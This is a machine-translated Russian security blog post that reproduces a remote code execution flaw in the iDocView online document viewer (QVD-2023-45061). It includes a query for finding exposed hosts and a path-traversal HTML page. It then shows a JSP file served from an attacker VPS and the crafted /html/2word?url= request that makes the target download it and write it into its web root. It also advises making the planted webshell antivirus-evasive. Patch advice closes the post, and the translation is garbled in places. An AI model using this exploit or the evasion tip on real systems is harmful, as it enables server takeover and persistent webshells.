Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор: Locks_@Timeline Sec Количество слов в этой статье: 1042. Время чтения: 2~3 минуты. Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.

0x01 Введение

Система онлайн-просмотра документов I Doc View — это система, разработанная Beijing Zhuoran Online Information Technology Co., Ltd. В основном он предоставляет пользователям возможность онлайн-просмотра различных типов файлов документов без загрузки или установки соответствующего программного обеспечения.

0x02 Обзор уязвимостей

Номер уязвимости: QVD-2023-45061.

В онлайн-системе предварительного просмотра документов I Doc View существует уязвимость, связанная с удаленным выполнением кода. Неаутентифицированный удаленный злоумышленник может использовать интерфейс «/html/2word?url=", чтобы позволить серверу удаленно загружать вредоносные файлы и выполнять произвольный код.

0x03 Затронутая версия

iDocView < 13.10.1_20231115

0x04 Настройка среды

Если у вас есть условия, пожалуйста, переезжайте сюда.

Запросите месячную бесплатную пробную версию для установки на свой сервер.,Пожалуйста, заполните эту форму заявки:
https://wj.qq.com/s2/5983516/63c4/

Грамматический запрос:

title == «Интернет-просмотр документа» - I Doc View"

0x05 Повторение уязвимости

Шаг 1: Лучше всего создать новую папку на VPS для воспроизведения.

vim timelinesec.htmlструктураhtmlдокумент

<!DOCTYPE html>
<html lang="en">
<head>
    <title>test</title>
</head>
<body>
  <link href="/..\..\..\docview\locks.jsp">
</body>
</html>

Создание вредоносных файлов

vi '..\..\..\docview\locks.jsp'
 
 
<%out.print("Locks_");%>

Включите http-службу Python на сервере.

python3.10 -m http.server 80

Затем перейдите по пути в онлайн-системе предварительного просмотра документов I Doc View:

http://your-ip/html/2word?url=http://your-vps-ip/timelinesec.html

https://xxx.xx.xx.xx:84/html/2word?url=http://your-vps-ip/timelinesec.html

Все остальные используются для предыдущих тестов, так что не беспокойтесь об этом. Когда оба запроса ответят на 200, будет загружен текстовый файл, что указывает на успешную работу эксплойта.

Проверка доступа к locks.jsp

Советы: перед успешной загрузкой загруженная лошадь должна быть свободна от убийств.

Метод загрузки тот же, просто подождите некоторое время и позвольте пулям полететь некоторое время.

Анализ уязвимостей: функция удаленного кэширования страниц в приложении синтаксического анализа не выполняет достаточную проверку безопасности входного URL-адреса. Создавая специальный URL-адрес, приложение загружает вредоносные файлы.

0x06 Как это исправить

1. Официальный план ремонта:Поставщик отключенлазейки Соответствующие интерфейсы и обновление версии программного обеспечения до13.10.1_20231115,Клиенты могут обновиться до этой версии, чтобы решить проблему.,Официальный сайт https://api.idocv.com обновлен до последней версии.

2. План временного ремонта:a.Используйте защитное оборудование для защиты связанных активов；b.если в этом нет необходимости,При необходимости избегайте доступа к ресурсам в Интернет; при необходимости ограничивайте источники доступа с помощью сетевых политик ACL;,Разрешить доступ только определенным IP-адресам; c. Запретить серверу активный доступ к внешним незнакомым ссылкам.